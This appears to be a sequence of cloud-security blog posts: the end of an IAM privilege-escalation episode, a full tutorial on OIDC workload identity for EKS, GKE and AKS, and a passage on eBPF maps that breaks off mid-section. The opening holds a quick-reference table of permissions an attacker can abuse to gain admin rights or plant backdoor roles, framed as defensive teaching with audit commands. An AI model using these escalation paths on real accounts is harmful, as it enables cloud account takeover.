╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — CloudTrail doesn't log data plane events by default ║
║                                                                      ║
║  S3 object reads (GetObject), Secrets Manager reads (GetSecretValue)║
║  and SSM GetParameter are data events — not logged by CloudTrail   ║
║  unless you explicitly enable Data Events. An attacker exfiltrating ║
║  data via these calls leaves no trace in a default CloudTrail       ║
║  configuration.                                                      ║
║                                                                      ║
║  Fix: enable S3 and Lambda data events in CloudTrail. At minimum    ║
║  enable logging for secretsmanager:GetSecretValue.                  ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌──────────────────────────────────┬──────────────────────────────────────────────────────┐
│ Permission                       │ Escalation Path                                      │
├──────────────────────────────────┼──────────────────────────────────────────────────────┤
│ iam:CreatePolicyVersion          │ Rewrite your own policy to grant *:*                 │
│ iam:PassRole (Resource: *)       │ Assign AdminRole to a Lambda/EC2 you control         │
│ iam:CreateRole+AttachRolePolicy  │ Create and arm a backdoor cross-account role         │
│ iam:UpdateAssumeRolePolicy       │ Hijack existing admin role's trust policy            │
│ iam.serviceAccounts.actAs (GCP)  │ Impersonate any service account including admins     │
│ iam.serviceAccountKeys.create    │ Generate permanent key for any SA                    │
│ roleAssignments/write (Azure)    │ Assign Owner to yourself at subscription scope       │
└──────────────────────────────────┴──────────────────────────────────────────────────────┘

Defensive commands:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — find all roles with iam:PassRole on Resource: *                              │
│  aws iam list-policies --scope Local --query 'Policies[*].Arn' --output text | \     │
│    xargs -I{} aws iam get-policy-version \                                            │
│      --policy-arn {} --version-id v1 --query 'PolicyVersion.Document'                │
│                                                                                        │
│  # AWS — check who can assume a given role                                            │
│  aws iam get-role --role-name AdminRole \                                             │
│    --query 'Role.AssumeRolePolicyDocument'                                            │
│                                                                                        │
│  # AWS — simulate whether a principal can CreatePolicyVersion                        │
│  aws iam simulate-principal-policy \                                                  │
│    --policy-source-arn arn:aws:iam::ACCOUNT:role/DevRole \                           │
│    --action-names iam:CreatePolicyVersion \                                           │
│    --resource-arns arn:aws:iam::ACCOUNT:policy/DevPolicy                             │
│                                                                                        │
│  # GCP — check who has actAs on a service account                                    │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL \                               │
│    --format=json | jq '.bindings[] | select(.role=="roles/iam.serviceAccountUser")'  │
│                                                                                        │
│  # GCP — list service account keys (find persistent backdoors)                       │
│  gcloud iam service-accounts keys list --iam-account=SA_EMAIL                        │
│                                                                                        │
│  # Azure — list all role assignments at subscription scope                           │
│  az role assignment list --scope /subscriptions/SUB_ID --output table                │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 6 — Security Assessment and Testing IAM attack paths are the foundation of cloud penetration testing and access review methodology
CISSP Domain 5 — Identity and Access Management Defensive IAM design requires understanding offensive technique — you cannot protect paths you don’t know exist
ISO 27001:2022 8.8 Management of technical vulnerabilities IAM misconfigurations are technical vulnerabilities — identifying and remediating privilege escalation paths
ISO 27001:2022 8.16 Monitoring activities Detection signals and alerting on IAM mutations as part of continuous monitoring
SOC 2 CC7.1 Threat and vulnerability identification — this episode maps the threat model for cloud IAM
SOC 2 CC6.1 Understanding attack paths informs the design of logical access controls that actually hold

Key Takeaways

  • Cloud breaches are IAM events — the initial compromise is just the door; IAM misconfigurations determine how far an attacker can go
  • iam:PassRole with Resource: * is AWS’s highest-risk single permission — scope it to specific role ARNs or the escalation paths multiply
  • iam:CreatePolicyVersion and iam:UpdateAssumeRolePolicy are privilege escalation and persistence primitives — restrict them to dedicated admin roles
  • iam.serviceAccounts.actAs in GCP and roleAssignments/write in Azure are direct equivalents — same threat model, cloud-specific syntax
  • Enforce IMDSv2 on EC2; disable SA key creation org-wide in GCP; restrict role assignment scope in Azure
  • Enable CloudTrail Data Events — default logging misses S3 reads, Secrets Manager reads, and SSM GetParameter calls entirely
  • Alert on IAM mutations — low-volume, high-signal events that should never go unmonitored

What’s Next

You now know how attackers move through misconfigured IAM. AWS least privilege audit is the defensive counterpart — using Access Analyzer, GCP IAM Recommender, and Azure Access Reviews to find and right-size over-permissioned access before an attacker does. The goal: get from wildcard policies to scoped, auditable permissions without breaking production.

Next: AWS Least Privilege Audit: From Wildcard Permissions to Scoped Policies

Get EP09 in your inbox when it publishes → linuxcent.com/subscribe

OIDC Workload Identity: Eliminate Cloud Access Keys Entirely

Reading Time: 12 minutes

Meta Description: Replace static cloud credentials with OIDC workload identity — eliminate key rotation entirely for Lambda, GKE, and EKS workloads in production.


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload Identity


TL;DR

  • Workload identity federation replaces static cloud access keys with short-lived tokens tied to runtime identity — no key to rotate, no secret to leak
  • The OIDC token exchange pattern is consistent across AWS (IRSA / Pod Identity), GCP (Workload Identity), and Azure (AKS Workload Identity) — learn one, translate the others
  • AWS EKS: use Pod Identity for new clusters; IRSA is the pattern for existing ones — both eliminate static keys
  • GCP GKE: --workload-pool at cluster level + roles/iam.workloadIdentityUser binding on the GCP service account
  • Azure AKS: federated credential on a managed identity + azure.workload.identity/use: "true" pod label
  • Cross-cloud federation works: an AWS IAM role can call GCP APIs without a GCP key file on the AWS side
  • Enforce IMDSv2 everywhere; pin OIDC trust conditions to specific service account names; give each workload its own identity

The Big Picture

  WORKLOAD IDENTITY FEDERATION — BEFORE AND AFTER

  ── STATIC CREDENTIALS (the broken model) ────────────────────────────────

  IAM user created → access key generated
         ↓
  Key distributed to pods / CI / servers → stored in Secrets, env vars, .env
         ↓
  Valid indefinitely — never expires on its own
         ↓
  Rotation is manual, painful, deferred ("there's a ticket for that")
         ↓
  Key proliferates across environments — you lose track of every copy
         ↓
  Leaked key → unlimited blast radius until someone notices and revokes it

  ── WORKLOAD IDENTITY FEDERATION (the current model) ─────────────────────

  No key created. No key distributed. No key to rotate.

  Workload starts → requests signed JWT from its native IdP
         │           (EKS OIDC issuer, GitHub Actions, GKE metadata server)
         ↓
  JWT carries workload claims: namespace, service account, repo, instance ID
         ↓
  Cloud STS / token endpoint validates JWT signature + trust conditions
         ↓
  Short-lived credential issued  (AWS STS: 1–12h  |  GCP/Azure: ~1h)
         ↓
  Credential expires automatically — nothing to clean up
         ↓
  Token stolen → usable for 1 hour maximum, audience-bound, not reusable

Workload identity federation is the architectural answer to static credential sprawl. The workload’s proof of identity is its runtime environment — the cluster it runs in, the repository it belongs to, the service account it uses. The cloud provider never issues a persistent secret. This episode covers how that exchange works across all three clouds and Kubernetes.


Introduction

Workload identity federation eliminates static cloud credentials by replacing them with short-lived tokens that the runtime environment generates and the cloud provider validates against a registered trust relationship. No key to distribute, no rotation schedule to maintain, no proliferation to track.

A while back I was reviewing a Kubernetes cluster that had been running in production for about two years. The team had done good work — solid app code, reasonable cluster configuration. But when I started looking at how pods were authenticating to AWS, I found what I find in roughly 60% of environments I look at.

Twelve service accounts. Twelve access key pairs. Keys created 6 to 24 months ago. Stored as Kubernetes Secrets. Mounted into pods as environment variables. Never rotated because “the app would need to be restarted” and nobody owned the rotation schedule. Two of the keys belonged to AWS IAM users who no longer worked at the company — the users had been deactivated, but the access keys were still valid because in AWS, access keys live independently of console login status.

When I asked who was responsible for rotating these, the answer I got was: “There’s a ticket for that.”

There’s always a ticket for that.

The engineering problem here isn’t that the team was careless. It’s that static credentials are fundamentally unmanageable at scale. Workload identity removes the problem at its root.


Why Static Credentials Are the Wrong Model for Machines

Before getting into solutions, let me be precise about why this is a security problem, not just an operational inconvenience.

Static credentials have four fundamental failure modes:

They don’t expire. An AWS access key created in 2022 is valid in 2026 unless someone explicitly rotates it. GitGuardian’s 2024 data puts the average time from secret creation to detection at 328 days. That’s almost a year of exposure window before anyone even knows.

They lose origin context. When an API call arrives at AWS with an access key, the authorization system can tell you what key was used — not whether it was used by your Lambda function, by a developer debugging something, or by an attacker using a stolen copy. Static credentials are context-blind.

They proliferate invisibly. One key, distributed to a team, copied into three environments, cached on developer laptops, stored in a CI/CD pipeline, pasted into a config file in a test environment that got committed. By the time you need to rotate it, you don’t know all the places it lives.

Rotation is operationally painful. Creating a new key, updating every place the old key lives, removing the old key — while ensuring nothing breaks during the transition — is a coordination exercise that organizations consistently defer. Every month the rotation doesn’t happen is another month of accumulated risk.

Workload identity solves all four by replacing persistent credentials with short-lived tokens that are generated from the runtime environment and verified by the cloud provider against a registered trust relationship.


The OIDC Exchange — What’s Actually Happening

All three major cloud providers have converged on the same underlying mechanism: OIDC token exchange.

Workload (pod, GitHub Actions runner, EC2 instance, on-prem server)
    │
    │  1. Request a signed JWT from the native identity provider
    │     (EKS OIDC server, GitHub's token.actions.githubusercontent.com,
    │      GKE metadata server, Azure IMDS)
    ▼
Native IdP issues a JWT. It contains claims about the workload:
    - What repository triggered this CI run
    - What Kubernetes namespace and service account this pod uses
    - What EC2 instance ID this request came from
    │
    │  2. Workload presents the JWT to the cloud STS / federation endpoint
    ▼
Cloud IAM evaluates:
    - Is the JWT signature valid? (verified against the IdP's public keys)
    - Does the issuer match a registered trust relationship?
    - Do the claims match the conditions in the trust policy?
    │
    │  3. If all checks pass: short-lived cloud credentials issued
    │     (AWS: temporary STS credentials, expiry 1-12 hours)
    │     (GCP: OAuth2 access token, expiry ~1 hour)
    │     (Azure: access token, expiry ~1 hour)
    ▼
Workload calls cloud API with short-lived credentials.
Credentials expire. Nothing to clean up. Nothing to rotate.

No static secret is stored anywhere. The workload’s identity is its runtime environment — the cluster it runs in, the repository it belongs to, the service account it uses. If someone steals the short-lived token, it expires in an hour. If someone tries to use a token for a different resource than it was issued for, the audience claim doesn’t match and it’s rejected.


AWS: IRSA and Pod Identity for EKS

IRSA — The Original Pattern

IRSA (IAM Roles for Service Accounts) federates a Kubernetes service account identity with an AWS IAM role. Each pod’s service account is the proof of identity; AWS issues temporary credentials in exchange for the OIDC JWT.

# Step 1: get the OIDC issuer URL for your EKS cluster
OIDC_ISSUER=$(aws eks describe-cluster \
  --name my-cluster \
  --query "cluster.identity.oidc.issuer" \
  --output text)

# Step 2: register this OIDC issuer with IAM
aws iam create-open-id-connect-provider \
  --url "${OIDC_ISSUER}" \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list "$(openssl s_client -connect ${OIDC_ISSUER#https://}:443 2>/dev/null \
    | openssl x509 -fingerprint -noout | cut -d= -f2 | tr -d ':')"

# Step 3: create an IAM role with a trust policy scoped to a specific service account
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
OIDC_ID="${OIDC_ISSUER#https://}"

cat > irsa-trust.json << EOF
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "Federated": "arn:aws:iam::${ACCOUNT_ID}:oidc-provider/${OIDC_ID}"
    },
    "Action": "sts:AssumeRoleWithWebIdentity",
    "Condition": {
      "StringEquals": {
        "${OIDC_ID}:sub": "system:serviceaccount:production:app-backend",
        "${OIDC_ID}:aud": "sts.amazonaws.com"
      }
    }
  }]
}
EOF

aws iam create-role \
  --role-name app-backend-s3-role \
  --assume-role-policy-document file://irsa-trust.json

aws iam put-role-policy \
  --role-name app-backend-s3-role \
  --policy-name AppBackendPolicy \
  --policy-document file://app-backend-policy.json
# Step 4: annotate the Kubernetes service account with the role ARN
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789012:role/app-backend-s3-role

The EKS Pod Identity webhook injects two environment variables into any pod using this service account: AWS_WEB_IDENTITY_TOKEN_FILE pointing to a projected token, and AWS_ROLE_ARN. The AWS SDK reads these automatically. The application doesn’t know any of this is happening — it just calls S3 and it works, using credentials that were never stored anywhere and expire automatically.

The trust policy’s sub condition is the security boundary. system:serviceaccount:production:app-backend means: only pods in the production namespace using the app-backend service account can assume this role. A pod in a different namespace, even with the same service account name, gets a different sub claim and the assumption fails.

EKS Pod Identity — The Simpler Modern Approach

AWS released Pod Identity as a simpler alternative to IRSA. No OIDC provider setup, no manual trust policy with OIDC conditions:

# Enable the Pod Identity agent addon on the cluster
aws eks create-addon \
  --cluster-name my-cluster \
  --addon-name eks-pod-identity-agent

# Create the association — this replaces the OIDC trust policy setup
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace production \
  --service-account app-backend \
  --role-arn arn:aws:iam::123456789012:role/app-backend-s3-role

Same result, less ceremony. For new clusters, Pod Identity is the path I’d recommend. IRSA remains important to understand for the many existing clusters already using it.

IAM Roles Anywhere — For On-Premises Workloads

Not everything runs in Kubernetes. For on-premises servers and workloads outside AWS, IAM Roles Anywhere issues temporary credentials to servers that present an X.509 certificate signed by a trusted CA:

# Register your internal CA as a trust anchor
aws rolesanywhere create-trust-anchor \
  --name "OnPremCA" \
  --source sourceType=CERTIFICATE_BUNDLE,sourceData.x509CertificateData="$(base64 -w0 ca-cert.pem)"

# Create a profile mapping the CA to allowed roles
aws rolesanywhere create-profile \
  --name "OnPremServers" \
  --role-arns "arn:aws:iam::123456789012:role/OnPremAppRole" \
  --trust-anchor-arns "${TRUST_ANCHOR_ARN}"

# On the on-prem server — exchange the certificate for AWS credentials
aws_signing_helper credential-process \
  --certificate /etc/pki/server.crt \
  --private-key /etc/pki/server.key \
  --trust-anchor-arn "${TRUST_ANCHOR_ARN}" \
  --profile-arn "${PROFILE_ARN}" \
  --role-arn "arn:aws:iam::123456789012:role/OnPremAppRole"

The server’s certificate (managed by your internal PKI or an ACM Private CA) is the proof of identity. No access key distributed to the server — just a certificate that your CA signed and that you can revoke through your existing certificate revocation infrastructure.


GCP: Workload Identity for GKE

For GKE clusters, Workload Identity is enabled at the cluster level and creates a bridge between Kubernetes service accounts and GCP service accounts:

# Enable Workload Identity on the cluster
gcloud container clusters update my-cluster \
  --workload-pool=my-project.svc.id.goog

# Enable on the node pool (required for the metadata server to work)
gcloud container node-pools update default-pool \
  --cluster=my-cluster \
  --workload-metadata=GKE_METADATA

# Create the GCP service account for the workload
gcloud iam service-accounts create app-backend \
  --project=my-project

SA_EMAIL="[email protected]"

# Grant the GCP SA the permissions it needs
gcloud storage buckets add-iam-policy-binding gs://app-data \
  --member="serviceAccount:${SA_EMAIL}" \
  --role="roles/storage.objectViewer"

# Create the trust relationship: K8s SA → GCP SA
gcloud iam service-accounts add-iam-policy-binding "${SA_EMAIL}" \
  --role=roles/iam.workloadIdentityUser \
  --member="serviceAccount:my-project.svc.id.goog[production/app-backend]"
# Annotate the Kubernetes service account
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    iam.gke.io/gcp-service-account: [email protected]

When the pod makes a GCP API call using ADC (Application Default Credentials), the GKE metadata server intercepts the credential request. It validates the pod’s Kubernetes identity, checks the IAM binding, and returns a short-lived GCP access token. The GCP service account key file never exists. There’s nothing to protect, nothing to rotate, nothing to leak.


Azure: Workload Identity for AKS

Azure’s workload identity for Kubernetes replaced the older AAD Pod Identity approach — which required a DaemonSet, had known TOCTOU vulnerabilities, and was operationally fragile. The current implementation uses the OIDC pattern:

# Enable OIDC issuer and workload identity on the AKS cluster
az aks update \
  --name my-aks \
  --resource-group rg-prod \
  --enable-oidc-issuer \
  --enable-workload-identity

# Get the OIDC issuer URL for this cluster
OIDC_ISSUER=$(az aks show \
  --name my-aks --resource-group rg-prod \
  --query "oidcIssuerProfile.issuerUrl" -o tsv)

# Create a user-assigned managed identity for the workload
az identity create --name app-backend-identity --resource-group rg-identities
CLIENT_ID=$(az identity show --name app-backend-identity -g rg-identities --query clientId -o tsv)
PRINCIPAL_ID=$(az identity show --name app-backend-identity -g rg-identities --query principalId -o tsv)

# Grant the identity the access it needs
az role assignment create \
  --assignee-object-id "$PRINCIPAL_ID" \
  --role "Storage Blob Data Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/appstore

# Federate: trust the K8s service account from this cluster
az identity federated-credential create \
  --name aks-app-backend-binding \
  --identity-name app-backend-identity \
  --resource-group rg-identities \
  --issuer "${OIDC_ISSUER}" \
  --subject "system:serviceaccount:production:app-backend" \
  --audience "api://AzureADTokenExchange"
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    azure.workload.identity/client-id: "CLIENT_ID_HERE"
---
apiVersion: v1
kind: Pod
metadata:
  labels:
    azure.workload.identity/use: "true"   # triggers token injection
spec:
  serviceAccountName: app-backend
  containers:
  - name: app
    image: my-app:latest
    # Azure SDK DefaultAzureCredential picks up the injected token automatically

Cross-Cloud Federation — When AWS Talks to GCP

The same OIDC mechanism works cross-cloud. An AWS Lambda or EC2 instance can call GCP APIs without any GCP service account key on the AWS side:

# GCP side: create a workload identity pool that trusts AWS
gcloud iam workload-identity-pools create "aws-workloads" --location=global

gcloud iam workload-identity-pools providers create-aws "aws-provider" \
  --workload-identity-pool="aws-workloads" \
  --account-id="AWS_ACCOUNT_ID"

# Bind the specific AWS role to the GCP service account
gcloud iam service-accounts add-iam-policy-binding [email protected] \
  --role=roles/iam.workloadIdentityUser \
  --member="principalSet://iam.googleapis.com/projects/GCP_PROJ_NUM/locations/global/workloadIdentityPools/aws-workloads/attribute.aws_role/arn:aws:sts::AWS_ACCOUNT:assumed-role/MyAWSRole"

The AWS workload presents its STS-issued credentials to GCP’s token exchange endpoint. GCP verifies the AWS signature, checks the attribute mapping (only MyAWSRole from that AWS account), and issues a short-lived GCP access token. No GCP service account key is ever distributed to the AWS side.


The Threat Model — What Workload Identity Doesn’t Solve

Workload identity dramatically reduces the attack surface, but it doesn’t eliminate it:

Threat What Still Applies Mitigation
Token theft from the container filesystem The projected token is readable if you have container filesystem access Short TTL (default 1h); tokens are audience-bound — can’t use a K8s token to call Azure APIs
SSRF to metadata service An SSRF vulnerability can fetch credentials from the metadata endpoint Enforce IMDSv2 on AWS; use metadata server restrictions on GKE/AKS
Overpermissioned service account Workload identity doesn’t enforce least privilege — the SA can still be over-granted One SA per workload; review permissions against actual usage
Trust policy too broad OIDC trust policy allows any service account in a namespace Always pin to specific SA name in the sub condition

The SSRF-to-metadata-service path deserves particular attention. IMDSv2 (mandatory in AWS by requiring a PUT to get a token before any metadata request) blocks most SSRF scenarios because a simple SSRF can only make GET requests. Enforce it:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP — no instance can launch without IMDSv2
{
  "Effect": "Deny",
  "Action": "ec2:RunInstances",
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringNotEquals": {
      "ec2:MetadataHttpTokens": "required"
    }
  }
}

⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — Trust policy scoped to namespace, not service account ║
║                                                                      ║
║  A condition like "sub": "system:serviceaccount:production:*"        ║
║  grants any pod in the production namespace the ability to assume    ║
║  the role. A compromised or new workload in that namespace gets      ║
║  access automatically.                                               ║
║                                                                      ║
║  Fix: always pin the sub condition to the exact service account      ║
║  name. "system:serviceaccount:production:app-backend" — not a glob.  ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Shared service accounts across workloads             ║
║                                                                      ║
║  Reusing one service account for multiple workloads saves setup      ║
║  time and creates a lateral movement path. A compromised workload    ║
║  that shares a service account with a payment processor has payment  ║
║  processor permissions.                                              ║
║                                                                      ║
║  Fix: one service account per workload. The overhead is low.         ║
║  The blast radius reduction is significant.                          ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — IMDSv1 still reachable after enabling IMDSv2        ║
║                                                                      ║
║  Enabling IMDSv2 on new instances doesn't affect existing ones.      ║
║  The SCP approach enforces it at the org level going forward, but    ║
║  existing instances need explicit remediation.                       ║
║                                                                      ║
║  Fix: audit existing instances for IMDSv1 exposure.                 ║
║  aws ec2 describe-instances --query                                  ║
║    "Reservations[].Instances[?MetadataOptions.HttpTokens!='required']║
║    .[InstanceId,Tags]"                                               ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌────────────────────────────────┬───────────────────────────────────────────────────────┐
│ Term                           │ What it means                                         │
├────────────────────────────────┼───────────────────────────────────────────────────────┤
│ Workload identity federation   │ OIDC-based exchange: runtime JWT → short-lived token  │
│ IRSA                           │ IAM Roles for Service Accounts — EKS + OIDC pattern   │
│ EKS Pod Identity               │ Newer, simpler IRSA replacement — no OIDC setup       │
│ GKE Workload Identity          │ K8s SA → GCP SA via workload pool + IAM binding       │
│ AKS Workload Identity          │ K8s SA → managed identity via federated credential    │
│ IAM Roles Anywhere             │ AWS temp credentials for on-prem via X.509 cert       │
│ IMDSv2                         │ Token-gated AWS metadata service — blocks SSRF        │
│ OIDC sub claim                 │ Workload's unique identity string — use for pinning   │
│ Projected service account token│ K8s-injected JWT — the OIDC token pods present to AWS │
└────────────────────────────────┴───────────────────────────────────────────────────────┘

Key commands:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — list OIDC providers registered in this account                               │
│  aws iam list-open-id-connect-providers                                               │
│                                                                                        │
│  # AWS — list Pod Identity associations for a cluster                                 │
│  aws eks list-pod-identity-associations --cluster-name my-cluster                     │
│                                                                                        │
│  # AWS — verify what credentials a pod is actually using                              │
│  aws sts get-caller-identity   # run from inside the pod                              │
│                                                                                        │
│  # AWS — audit instances missing IMDSv2                                               │
│  aws ec2 describe-instances \                                                          │
│    --query "Reservations[].Instances[?MetadataOptions.HttpTokens!='required']          │
│    .[InstanceId]" --output text                                                        │
│                                                                                        │
│  # GCP — verify workload identity binding on a GCP service account                   │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL                                  │
│                                                                                        │
│  # GCP — list workload identity pools                                                 │
│  gcloud iam workload-identity-pools list --location=global                            │
│                                                                                        │
│  # Azure — list federated credentials on a managed identity                           │
│  az identity federated-credential list \                                               │
│    --identity-name app-backend-identity --resource-group rg-identities                │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 5 — Identity and Access Management Non-human identities dominate cloud environments; workload identity federation is the modern machine authentication pattern
CISSP Domain 1 — Security & Risk Management Static credential sprawl is a measurable, eliminable risk; workload identity removes it at the root
ISO 27001:2022 5.17 Authentication information Managing machine credentials — workload identity replaces long-lived secrets with short-lived, environment-bound tokens
ISO 27001:2022 8.5 Secure authentication OIDC token exchange is the secure authentication mechanism for machine identities
ISO 27001:2022 5.18 Access rights Service account provisioning and deprovisioning — workload identity ties access to the runtime environment, not a stored secret
SOC 2 CC6.1 Workload identity federation is the preferred technical control for machine-to-cloud authentication in CC6.1
SOC 2 CC6.7 Short-lived, audience-bound tokens restrict credential reuse across systems — addresses transmission and access controls

Key Takeaways

  • Static credentials for machine identities are the problem, not the solution — workload identity federation eliminates them at the root
  • The OIDC token exchange pattern is consistent across AWS (IRSA/Pod Identity), GCP (Workload Identity), and Azure (AKS Workload Identity) — learn one, the others are a translation
  • AWS EKS: use Pod Identity for new clusters; IRSA remains the pattern for existing ones — both eliminate static keys
  • GCP GKE: Workload Identity enabled at cluster level, SA annotation at the K8s service account level
  • Azure AKS: federated credential on the managed identity, azure.workload.identity/use: "true" label on pods
  • Cross-cloud federation works — an AWS IAM role can call GCP APIs without a GCP key file
  • Enforce IMDSv2 everywhere; pin OIDC trust conditions to specific service account names; apply least privilege to the underlying cloud identity

What’s Next

You’ve eliminated the static credential problem. The next question is: what happens when the IAM configuration itself is the vulnerability? AWS IAM privilege escalation goes into the attack paths — how iam:PassRole, iam:CreateAccessKey, and misconfigured trust policies turn IAM misconfigurations into full account compromise. If you’re designing or auditing cloud access control, you need to know these paths before an attacker finds them.

Next: AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise

Get EP08 in your inbox when it publishes → linuxcent.com/subscribe

eBPF Maps — The Persistent Data Layer Between Kernel and Userspace

Reading Time: 10 minutes

eBPF: From Kernel to Cloud, Episode 5
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps**


TL;DR

  • eBPF programs are stateless — maps are where all state lives, between invocations and between kernel and userspace
  • Every production eBPF tool (Cilium, Falco, Tetragon, Datadog NPM) is a map-based architecture — bpftool map list shows you what it’s actually holding
  • Per-CPU maps eliminate write contention for high-frequency counters; the tool aggregates per-CPU values at export time
  • LRU maps handle unbounded key spaces (IPs, PIDs, connections) without hard errors when full — but eviction is silent, so size generously
  • Ring buffer (kernel 5.8+) is the correct event streaming primitive — Falco and Tetragon both use it
  • Map memory is kernel-locked and invisible to standard memory metrics — account for it explicitly on eBPF-heavy nodes
  • Pinned maps survive restarts; Cilium uses this for zero-disruption connection tracking through upgrades

The Big Picture

  HOW eBPF MAPS CONNECT KERNEL PROGRAMS TO USERSPACE TOOLS

  ┌─────────────────────────────────────────────────────────────┐
  │  Kernel space                                               │
  │                                                             │
  │  [XDP program]  [TC program]  [kprobe]  [tracepoint]        │
  │        │              │           │           │             │
  │        └──────────────┴───────────┴───────────┘             │
  │                              │                              │
  │                   bpf_map_update_elem()                     │
  │                              │                              │
  │                              ▼                              │
  │  ┌─────────────────────────────────────────────────────┐    │
  │  │             eBPF MAP (kernel object)                │    │
  │  │  hash · percpu_hash · lru_hash · ringbuf · lpm_trie │    │
  │  │  Lives outside program invocations.                 │    │
  │  │  Pinned maps (/sys/fs/bpf/) survive restarts.       │    │
  │  └────────────────────┬────────────────────────────────┘    │
  └───────────────────────│─────────────────────────────────────┘
                          │  read / write via file descriptor
                          ▼
  ┌─────────────────────────────────────────────────────────────┐
  │  Userspace tools                                            │
  │                                                             │
  │  Cilium agent  Falco engine  Tetragon  bpftool map dump     │
  └─────────────────────────────────────────────────────────────┘

eBPF maps are the persistent data layer between kernel programs and the tools that consume their output. eBPF programs fire and exit — there’s no memory between invocations. Yet Cilium tracks TCP connections across millions of packets, and Falco correlates a process exec from five minutes ago with a suspicious network connection happening now. The mechanism between stateless kernel programs and the stateful production tools you depend on is what this episode is about — and understanding it changes what you see when you run bpftool map list.


I was trying to identify the noisy neighbor saturating a cluster’s egress link. I had an eBPF program loading cleanly, events firing, everything confirming it was working. But when I read back the per-port connection counters from userspace, everything was zero.

I spent an hour on it before posting to the BCC mailing list. The reply came back fast: eBPF programs don’t hold state between invocations. Every time the kprobe fires, the program starts fresh. The counter I was incrementing existed only for that single call — created, incremented to one, then discarded. On every single invocation. I was counting events one at a time, throwing the count away, and reading nothing.

That’s what eBPF maps solve.

Maps Are the Architecture, Not an Afterthought

Maps are kernel objects that live outside any individual program invocation. They’re shared between multiple eBPF programs, readable and writable from userspace, and persistent for the lifetime of the map — which can outlive both the program that created them and the userspace process that loaded them.

Every production eBPF tool is fundamentally a map-based architecture:

  • Cilium stores connection tracking state in BPF hash maps
  • Falco uses ring buffers to stream syscall events to its userspace rule engine
  • Tetragon maintains process tree state across exec events using maps
  • Datadog NPM stores per-connection flow stats in per-CPU maps for lock-free metric accumulation

Run bpftool map list on a Cilium node:

$ bpftool map list
ID 12: hash          name cilium_ct4_glo    key 24B  value 56B   max_entries 65536
ID 13: lpm_trie      name cilium_ipcache    key 40B  value 32B   max_entries 512000
ID 14: percpu_hash   name cilium_metrics    key 8B   value 32B   max_entries 65536
ID 28: ringbuf       name falco_events      max_entries 8388608

Connection tracking, IP policy cache, per-CPU metrics, event stream. Every one of these is a different map type, chosen for a specific reason.

Map Types and What They’re Actually Used For

Hash Maps

The general-purpose key-value store. A key maps to a value — lookup is O(1) average. Cilium’s connection tracking map (cilium_ct4_glo) is a hash map: the key is a 5-tuple (source IP, destination IP, ports, protocol), the value is the connection state.

$ bpftool map show id 12
12: hash  name cilium_ct4_glo  flags 0x0
        key 24B  value 56B  max_entries 65536  memlock 5767168B

The key 24B is the 5-tuple. The value 56B is the connection state record. max_entries 65536 is the upper bound — Cilium can track 65,536 active connections in this map before hitting the limit.

Hash maps are shared across all CPUs on the node. When multiple CPUs try to update the same entry simultaneously — which happens constantly on busy nodes — writes need to be coordinated. For most use cases this is fine. For high-frequency counters updated on every packet, it’s a bottleneck. That’s when you reach for a per-CPU hash map.

Where you see them: connection tracking, per-IP statistics, process-to-identity mapping, policy verdict caching.

Per-CPU Hash Maps

Per-CPU hash maps solve the write coordination problem by giving each CPU its own independent copy of every entry. There’s no sharing, no contention, no waiting — each CPU writes its own copy without touching any other.

The tradeoff: reading from userspace means collecting one value per CPU and summing them up. That aggregation happens in the tool, not the kernel.

# Cilium's per-CPU metrics map — one counter value per CPU
bpftool map dump id 14
key: 0x00000001
  value (CPU 00): 12345
  value (CPU 01): 8901
  value (CPU 02): 3421
  value (CPU 03): 7102
# total bytes for this metric: 31769

Cilium’s cilium_metrics map uses this pattern for exactly this reason — it’s updated on every packet across every CPU on the node. Forcing all CPUs to coordinate writes to a single shared entry at that rate would hurt throughput. Instead: each CPU writes locally, Cilium’s userspace agent sums the values at export time.

Where you see them: packet counters, byte counters, syscall frequency metrics — anywhere updates happen on every event at high volume.

LRU Hash Maps

LRU hash maps add automatic eviction. Same key-value semantics as a regular hash map, but when the map hits its entry limit, the least recently accessed entry is dropped to make room for the new one.

This matters for any map tracking dynamic state with an unpredictable number of keys: TCP connections, process IDs, DNS queries, pod IPs. Without LRU semantics, a full map returns an error on insert — and in production, that means your tool silently stops tracking new entries. Not a crash, not an alert — just missing data.

